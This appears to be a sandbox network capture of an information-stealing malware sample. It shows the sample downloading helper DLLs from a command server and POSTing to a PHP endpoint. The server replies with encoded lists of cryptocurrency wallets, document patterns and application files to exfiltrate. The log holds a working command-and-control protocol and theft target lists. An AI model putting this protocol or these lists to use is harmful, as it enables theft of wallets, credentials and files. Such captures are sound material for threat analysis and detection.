b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
Apr 26, 2024 23:09:12.615345001 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:12.961487055 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:12 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
Apr 26, 2024 23:09:13.395142078 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:13.747328043 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:13 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 26, 2024 23:09:16.647753954 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:16.995138884 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:16 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
Apr 26, 2024 23:09:17.564908981 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 23:09:17.911365032 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:17 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
Apr 26, 2024 23:09:18.680177927 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGC Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:19.057451963 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:19.136437893 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"wallets------AAEGHJKJKKJDHIDHJKJD--
Apr 26, 2024 23:09:19.489017010 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Apr 26, 2024 23:09:20.806113005 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="message"files------DGHDHIDGHIDGIECBKKJJ--
Apr 26, 2024 23:09:21.154694080 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 [TRUNCATED] Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBN [TRUNCATED]
Apr 26, 2024 23:09:21.189713001 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:21.568397045 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:21.700697899 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:22.076128960 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:22.086433887 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:22.463145971 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:22.468420029 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:22.851068020 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:22.857799053 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:23.232513905 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:26.543777943 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:26.924586058 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:27.150188923 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:27.527470112 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:27.554979086 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:27.933413982 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:28.000318050 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFII Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:28.375493050 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:28.380678892 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:28.760996103 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:28.766423941 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:29.143820047 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:29.270163059 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:29.653620005 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:31.173670053 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:31.558048010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:31.940023899 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:32.333081007 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:32.339494944 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:32.714597940 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:32.721139908 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
